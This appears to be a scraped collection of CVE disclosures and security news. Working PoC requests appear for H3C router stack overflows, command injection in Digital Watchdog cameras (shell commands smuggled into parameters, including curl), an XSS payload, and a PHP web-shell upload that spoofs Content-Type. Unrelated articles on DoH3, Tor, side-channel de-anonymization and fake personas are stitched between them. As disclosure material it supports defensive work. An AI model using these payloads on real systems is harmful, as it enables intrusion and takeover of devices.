H3C Magic R200 R200V200R004L02 was discovered to contain a stack overflow via the ajaxmsg parameter at /AJAX/ajaxget.

**H3C magic R200 R200V200R004L02.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202012/1361151\_30005\_0.htm

**Affected version**

The figure above shows the latest firmware.

**Vulnerability details**

The value of ajaxmsg is copied into the V11 array through the while loop. However, the size of the V11 array is only 132, which is easy to cause buffer overflow .

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R200V200R004L02.bin
2.  Attack with the following POC attacks

    POST /AJAX/ajaxget HTTP/1.1
    Host: 192.168.124.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: text/plain;charset=UTF-8
    Content-Length: 280
    Origin: https://192.168.124.1
    DNT: 1
    Connection: close
    Referer: https://192.168.124.1/access_ap_acl_cfg.asp?index=-1&search_key=&search_item=4&max_row=8&last_page=9999
    Cookie: LOGIN_PSD_REM_FLAG=; PSWMOBILEFLAG=true; LOGINCOUNT=; USERLOGINIDFLAG=
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    ajaxmsg=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

The above figure shows the POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-34608: vuln/H3C/7 at main · Darry-lang1/vuln

H3C Magic R200 R200V200R004L02 was discovered to contain a stack overflow via the INTF parameter at /doping.asp.

**H3C magic R200 R200V200R004L02.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202012/1361151\_30005\_0.htm

**Affected version**

The figure above shows the latest firmware.

**Vulnerability details**

The strncpy function copies the data between "INTF=" and "&" into the V8 array. Without limiting the size of the copy, the stack overflows.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R200V200R004L02.bin
2.  Attack with the following POC attacks

    GET /doping.asp?HOST=www.baidu.com&INTF=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa& HTTP/1.1 
    Host: 192.168.124.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate 
    DNT: 1 
    Connection: close 
    Referer: http://192.168.124.1/maintain_diag.asp
    Cookie: LOGIN_PSD_REM_FLAG=; PSWMOBILEFLAG=true; USERLOGINIDFLAG= 
    Upgrade-Insecure-Requests: 1
    

The above figure shows the POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-34609: vuln/H3C/9 at main · Darry-lang1/vuln

Google on Tuesday officially announced support for DNS-over-HTTP/3 (DoH3) for Android devices as part of a Google Play system update designed to keep DNS queries private.
To that end, Android smartphones running Android 11 and higher are expected to use DoH3 instead of DNS-over-TLS (DoT), which was incorporated into the mobile operating system with Android 9.0.
DoH3 is also an alternative to

Google on Tuesday officially announced support for DNS-over-HTTP/3 (DoH3) for Android devices as part of a Google Play system update designed to keep DNS queries private.

To that end, Android smartphones running Android 11 and higher are expected to use DoH3 instead of DNS-over-TLS (DoT), which was incorporated into the mobile operating system with Android 9.0.

DoH3 is also an alternative to DNS-over-HTTPS (DoH), a mechanism for carrying out remote Domain Name System (DNS) resolution through an encrypted connection, effectively preventing third parties from snooping on users' browsing activities.

HTTP/3, the first major upgrade to the hypertext transfer protocol since HTTP/2 was introduced in May 2015, is designed to use a new transport layer protocol called QUIC that's already supported by major browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Apple Safari.

The low-latency protocol, developed by Google in 2012, relies on the User Datagram Protocol (UDP) rather than the Transmission Control Protocol (TCP) to make HTTP traffic more secure and efficient, not to mention reduce the time it takes to establish connections between two endpoints.

"While using HTTPS alone will not reduce the overhead significantly, HTTP/3 uses QUIC, a transport that efficiently multiplexes multiple streams over UDP using a single TLS session with session resumption," Matthew Maurer and Mike Yu from the Android team said in a post.

DoH3 further has the advantage of maintaining stable connections even when mobile devices frequently change networks (e.g., from Wi-Fi to LTE). "With DoT, these events require a full renegotiation of the connection. By contrast, the QUIC transport HTTP/3 is based on can resume a suspended connection in a single RTT," Google noted.

What's more, to improve the security of the DNS resolver, the component has been implemented in Rust, enabling memory safe guarantees. It's worth pointing out that Google added Rust support to Android in April 2021.

"With the introduction of Rust, we are able to improve both security and the performance at the same time," Maurer and Yu said. "Likewise, QUIC allows us to improve network performance and privacy simultaneously."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Adds Support for DNS-over-HTTP/3 in Android to Keep DNS Queries Private

The debug interface of Goldshell ASIC Miners v2.2.1 and below was discovered to be exposed publicly on the web interface, allowing attackers to access passwords and other sensitive information in plaintext.

CVE-2022-24660: Cryptocurrency ASIC Miners – Security and Hacking Audit – James A. Chambers

Digital Watchdog DW MEGApix IP cameras A7.2.2_20211029 was discovered to contain a command injection vulnerability in the component /admin/vca/license/license_tok.cgi. This vulnerability is exploitable via a crafted POST request.

The following issue was found on DW Spectrum server software ver 4.2.0.32842 Information Disclosure: 1. API call displays internal paths, IPs, OS version and architecture. http://<SERVER IP>:7001/api/moduleInformation All issues below were found on A7.2.2\_20211029 firmware of MegaPix IP Camera by Digital Watchdog. The following issues were found through unauthenticated URLs: Information Disclosure: 1. Web files display internal paths and scripts, software versions (CWE-201) http://192.168.1.80/plugin\_info\_list.xml http://192.168.1.80/plugin/plugin\_web.conf http://192.168.1.80/plugin/port.conf 2. Information disclosure and session hijacking through core log (CWE-201) Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action Step 2. get core file by going to 192.168.1.80/cgi-bin/core Step 3. Use session token information from error event to log into admin pages The following issues were found through authenticated URLs: 1. Command injection on curltest.cgi web file http://192.168.1.80/cgi-bin/admin/curltest.cgi -injectable on test\[\] parameters smtp\_addr,smtp\_port,sender,receiver,id, and pass POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 299 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup\_main.cgi test%5Benabled%5D=1&test%5Bsmtp\_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl\_enable%5D=0&test%5Bsmtp\_port%5D=444&test%5Bssl\_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi 2. Command injection on adacph.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi -injectable on event, id, pluginname, name, and evt\_id paramaters GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt\_id=a 3. Command injection on license\_tok.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/license/license\_tok.cgi -injectable on POST guid,license\_value, and plugin\_info parameters POST /cgi-bin/admin/vca/license/license\_tok.cgi?getToken HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 96 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup\_main.cgi guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license\_value='fff' 4. XSS vulnerability in bia\_oneshot.cgi web file (CWE-79) http://192.168.1.80/cgi-bin/admin/vca/bia/bia\_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E -file contents injection allows persistent XSS through blob parameter

CVE-2022-34540: dw_vulns.txt

Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php.

Permalink

Cannot retrieve contributors at this time

**Barangay Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/bmis/pages/resident/resident.php

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Loophole location: Background management system Resident module editing function-> resident.php file picture upload point exists arbitrary file upload vulnerability (RCE).

Click "Save" to save

> Content-Type: image/jpeg //Key points (Bypass detection by changing "Content Type" to "Content-Type: image/jpeg")

Request package for file upload：

POST /bmis/pages/resident/resident.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/resident/resident.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------197262279020245
Content-Length: 4420
\-----------------------------197262279020245
Content-Disposition: form-data; name="hidden\_id"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_lname"
Suares
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_fname"
Jude
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_mname"
Reyes
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_bdate"
2021-10-12
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_brgy"
Brgy.Tan-awan
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_householdnum"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_dperson"
yes
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_btype"
0+
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_cstatus"
Single
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_length"
5
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_national"
Filipino
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_igpit"
1122
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_eattain"
Doctorate degree
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_los"
Care Taker
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_water"
Deep Well
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_toilet"
Water-sealed
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_remarks"
None
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_uname"
jude
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_gender"
Male
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_bplace"
Brgy. Mambato, Himamaylan City
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_mstatus"
single
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_zone"
1
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_householdmem"
10
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_rthead"
Brother
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_occp"
Programmer
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_income"
300000
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_religion"
Catholic
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_skills"
Programming
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_phno"
2147483647
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_hos"
Live with Parents/Relatives
\-----------------------------197262279020245
Content-Disposition: form-data; name="ddl\_edit\_dtype"
2nd Option
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_lightning"
2147483647
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_faddress"
brgy. enlcaro
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_upass"
jude123
\-----------------------------197262279020245
Content-Disposition: form-data; name="txt\_edit\_image"; filename="shell.php"
Content-Type: image/jpeg //Key points
JFJF
<?php phpinfo();?>
\-----------------------------197262279020245
Content-Disposition: form-data; name="btn\_save"
Save
\-----------------------------197262279020245
Content-Disposition: form-data; name="table\_length"
10
\-----------------------------197262279020245--

The files will be uploaded to this directory \\bmis\\pages\\resident\\image  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-34024: bug_report/RCE-1.md at main · sorabug/bug_report

New update addresses challenges faced by users in repressive countries

Jessica Haworth 19 July 2022 at 13:10 UTC

New update addresses challenges faced by users in repressive countries

A new release of Tor Browser enables users to circumvent location-specific censorship to connect to the anonymous web browser more easily.

Introduced in version 11.5, Connection Assist automatically applies the bridge configuration deemed to be best for different locations that have blocked the privacy-first browser, including Belarus, China, Russia, and Turkmenistan.

**Easier access**

Previously, circumventing censorship of the Tor network required users to dive into network settings and figure out for themselves how to apply a bridge.

Censorship of Tor also is not uniform. While a certain pluggable transport or bridge configuration may work in one country, it won’t necessarily work elsewhere.

READ MORE Tails users warned not to launch bundled Tor Browser until security fix is released

“This placed the burden on censored users (who are already under significant pressure) to figure out what option to pick, resulting in a lot of trial, error, and frustration in the process,” a blog post from the Tor Project, released on July 14, explains.

The tool works by “looking up and downloading an up-to-date list of country-specific options to try using your location (with your consent)”.

It manages to do so without needing to connect to the Tor network first by utilizing moat – the same domain-fronting tool that Tor Browser uses to request a bridge from torproject.org, the blog post explains.

**Other changes**

Also included in the latest release is the introduction of HTTPS-Only by default on the desktop version of the browser.

The HTTPS-Everywhere extension, which was previously bundled with Tor Browser, was deprecated this year by the Electronic Frontier Foundation, after the majority of sites globally were deemed to be HTTPS-secure by default.

Tor Browser, which is built on Firefox, has since introduced HTTPS-Only Mode which was released by Mozilla in November 2020.

BACKGROUND Mission accomplished: Security plugin HTTPS Everywhere to be deprecated in 2022

The blog post reads: “Starting in Tor Browser 11.5, HTTPS-Only Mode is enabled by default for desktop, and HTTPS-Everywhere will no longer be bundled with Tor Browser.

“Why now? Research by Mozilla indicates that the fraction of insecure pages visited by the average users is very low – limiting the disruption caused to the user experience.

“Additionally, this change will help protect our users from SSL stripping attacks by malicious exit relays, and strongly reduces the incentive to spin up exit relays for man-in-the-middle attacks in the first place.”

DEEP DIVES Tor security: Everything you need to know about the anonymity network

Tor Browser 11.5 release enables users to automatically circumvent censorship

In Kentico before 13.0.66, attackers can achieve Denial of Service via a crafted request to the GetResource handler.

CVE-2022-32387: Hotfixes

A group of academics from the New Jersey Institute of Technology (NJIT) has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor.
"An attacker who has complete or partial control over a website can learn whether a specific target (i.e., a unique individual) is browsing the website," the researchers said. "The attacker knows this

A group of academics from the New Jersey Institute of Technology (NJIT) has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor.

"An attacker who has complete or partial control over a website can learn whether a specific target (i.e., a unique individual) is browsing the website," the researchers said. "The attacker knows this target only through a public identifier, such as an email address or a Twitter handle."

The cache-based targeted de-anonymization attack is a cross-site leak that involves the adversary leveraging a service such as Google Drive, Dropbox, or YouTube to privately share a resource (e.g., image, video, or a YouTube playlist) with the target, followed by embedding the shared resource into the attack website.

This can be achieved by, say, privately sharing the resource with the target using the victim's email address or the appropriate username associated with the service and then inserting the leaky resource using an <iframe> HTML tag.

In the next step, the attacker tricks the victim into visiting the malicious website and clicking on the aforementioned content, causing the shared resource to be loaded as a pop-under window (as opposed to a pop-up) or a browser tab — a method that's been used by advertisers to sneakily load ads.

This exploit page, as it's rendered by the target's browser, is used to determine if the visitor can access the shared resource, successful access indicating that the visitor is indeed the intended target.

The attack, in a nutshell, aims to unmask the users of a website under the attacker's control by connecting the list of accounts tied to those individuals with their social media accounts or email addresses through a piece of shared content.

In a hypothetical scenario, a bad actor could share a video hosted on Google Drive with a target's email address, and follow it up by inserting this video in the lure website. Thus when visitors land on the portal, a successful loading of the video could be used as a yardstick to infer if their victim is one among them.

The attacks, which are practical to exploit across desktop and mobile systems with multiple CPU microarchitectures and different web browsers, are made possible by means of a cache-based side channel that's used to glean if the shared resource has been loaded and therefore distinguish between targeted and non-targeted users.

Put differently, the idea is to observe the subtle timing differences that arise when the shared resource is being accessed by the two sets of users, which, in turn, occurs due to differences in the time it takes to return an appropriate response from the web server depending on the user's authorization status.

The attacks also take into account a second set of differences on the client-side that happens when the web browser renders the relevant content or error page based on the response received.

"There are two main causes for differences in the observed side channel leakages between targeted and non-targeted users – a server-side timing difference and a client-side rendering difference," the researchers said.

While most popular platforms such as those from Google, Facebook, Instagram, LinkedIn, Twitter, and TikTok were found susceptible, one notable service that's immune to the attack is Apple iCloud.

It's worth pointing out the de-anonymization method banks on the prerequisite that the targeted user is already logged in to the service. As mitigations, the researchers have released a browser extension called Leakuidator+ that's available for Chrome, Firefox, and Tor browsers.

To counter the timing and rendering side channels, website owners are recommended to design web servers to return their responses in constant time, irrespective of whether the user is provisioned to access the shared resource, and make their error pages as similar as possible to the content pages to minimize the attacker-observable differences.

"As an example, if an authorized user was going to be shown a video, the error page for the non-targeted user should also be made to show a video," the researchers said, adding websites should also be made to require user interaction before rendering content.

"Knowing the precise identity of the person who is currently visiting a website can be the starting point for a range of nefarious targeted activities that can be executed by the operator of that website."

The findings arrive weeks after researchers from the University of Hamburg, Germany, demonstrated that mobile devices leak identifying information such as passwords and past holiday locations via Wi-Fi probe requests.

In a related development, MIT researchers last month revealed the root cause behind a website fingerprinting attack as not due to signals generated by cache contention (aka a cache-based side channel) but rather due to system interrupts, while showing that interrupt-based side channels can be used to mount a powerful website fingerprinting attack.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Cache Side Channel Attack Can De-Anonymize Targeted Online Users

And some ways to up your game for identifying fabricated online profiles of people who don't exist.

On April 18, 2022, a handful of US citizens scrambled to get their taxes filed. While tax season is usually a stressor, consider that these filers got some unsolicited help. Imagine that somehow, strangers that might resemble angels just appeared in their lives, offering guidance and help to work with them through this process … all through the computer screen.

For our story, let's consider we receive a benign LinkedIn message from "Alice Dupree," stating that she is a liaison with H&R Block and is reaching out to offer any assistance in filing taxes. If we examine Alice's profile, everything mentioned lines up with her public presence. In fact, she looks like a very reputable person! She attended a prestigious university, has had a prolific career, and has an enticing professional summary.  

While we could review her education and past work experience with her LinkedIn profile, there is certainly other demographic, geographic, or personal information that we wouldn’t see online. So let's talk about Alice on a more personal level.

She is 49 years old, she lives in San Diego, California, and her favorite color is black (to match the business suits she wears). On top of that, she was born on July 1, 1972, and her zodiac sign is Cancer. She drives a 2005 Lexus LS to visit her mother (maiden name "Weaver"), and in case you ever need to reach her, her cell phone number is 909-722-3198.

She has an O+ blood type and has a Mastercard that expires in February 2025. Alice owns an iPhone, but when she is on her computer, she uses the Firefox Web browser.

We never would have the need for that information, or ask any questions pertaining to it — but if we did, Alice would have all the answers. It is her life story, after all!

You might be wondering how I know so much about Alice. Well, that's because I made her up.

Alice doesn't exist, and all her background information has been randomly computer generated to make her character all the more convincing. Her entire persona was artificially created with free, publicly accessible online tools that anyone can use.

**Faking People (For Real)**

It is surprisingly easy to come up with a whole identity for a fake person in this day and age. In all reality, there are online tools that do all the hard work for you. Social engineering is just too easy for scammers and cybercriminals.

Perpetrators can use Fake Name Generator to rapidly create an entire persona for fake but believable characters — just like I did with Alice Dupree.

    

Once all this background information has been generated and supplied for a budding scammer, they simply need a believable profile picture to replace the default gray silhouette.

If it wasn't already easy enough, cybercriminals and scammers can not only generate an entire person's history, but also their appearance with another online tool like This Person Does Not Exist.

**How Can You Tell What Is Real?**

Maybe an observant eye might notice a few telltales that this Alice character is a randomly generated persona. The profile picture gained from This Person Does Not Exist might have the strongest indicators:

*   The person's gaze is directly into the camera.

*   They might have odd or unusual traits.

*   Accessories like hats or glasses or even hair strands might fade in and out.

*   The side edges background may have very strange figures.

You may have noticed our so-called Alice is wearing earrings, but the left looks a bit more distorted than the right.

    

  
But how can someone defend against falling for Internet scams like this? Whenever possible, if an individual can do their due diligence by reaching out to the alleged company or school this persona is/was a part of, they can determine if this is legitimate.

Examining their profile might also reveal that the account has little to no activity. Social media sites may prune or remove accounts with little to no activity, in which case scammers really need to spend time to keep up the charade and look as realistic as possible.

If there is any suspicion you received a message from a fake persona, it is worth doing some online research to determine if this person is who they say they are – or if they exist at all.

For some semblance of "training your eyes" to detect fake computer-generated profile pictures, check out Which Face Is Real. Bear in mind some of the indicators discussed: centered eyes, blurry backgrounds, fading glasses or hair strands, and mismatched earrings. When lies and cons are at your door, inbox, or direct messages, _you_ are the front line of defense.

Tag

#firefox